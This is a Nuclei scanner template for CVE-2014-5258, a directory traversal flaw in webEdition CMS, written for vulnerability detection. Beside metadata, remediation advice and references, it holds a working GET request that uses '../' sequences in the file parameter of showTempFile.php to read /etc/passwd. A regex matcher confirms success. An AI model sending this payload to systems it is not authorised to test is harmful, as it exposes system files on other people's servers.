nuclei-templates/http/cves/2014/CVE-2014-5258.yaml

44 lines
1.5 KiB
YAML

id: CVE-2014-5258
info:
name: webEdition 6.3.8.0 - Directory Traversal
author: daffainfo
severity: medium
description: A directory traversal vulnerability in showTempFile.php in webEdition CMS before 6.3.9.0 Beta allows remote authenticated users to read arbitrary files via a .. (dot dot) in the file parameter.
remediation: |
Upgrade to a patched version of webEdition or apply the necessary security patches to fix the directory traversal vulnerability.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2014-5258
- https://www.exploit-db.com/exploits/34761
- http://packetstormsecurity.com/files/128301/webEdition-6.3.8.0-Path-Traversal.html
- http://www.webedition.org/de/webedition-cms/versionshistorie/webedition-6/version-6.3.9.0
- http://www.webedition.org/de/aktuelles/webedition-cms/webEdition-6.3.9-Beta-erschienen
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:S/C:P/I:N/A:N
cvss-score: 4
cve-id: CVE-2014-5258
cwe-id: CWE-22
epss-score: 0.01386
epss-percentile: 0.84675
cpe: cpe:2.3:a:webedition:webedition_cms:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: webedition
product: webedition_cms
tags: edb,packetstorm,cve,cve2014,lfi
http:
- method: GET
path:
- "{{BaseURL}}/webEdition/showTempFile.php?file=../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200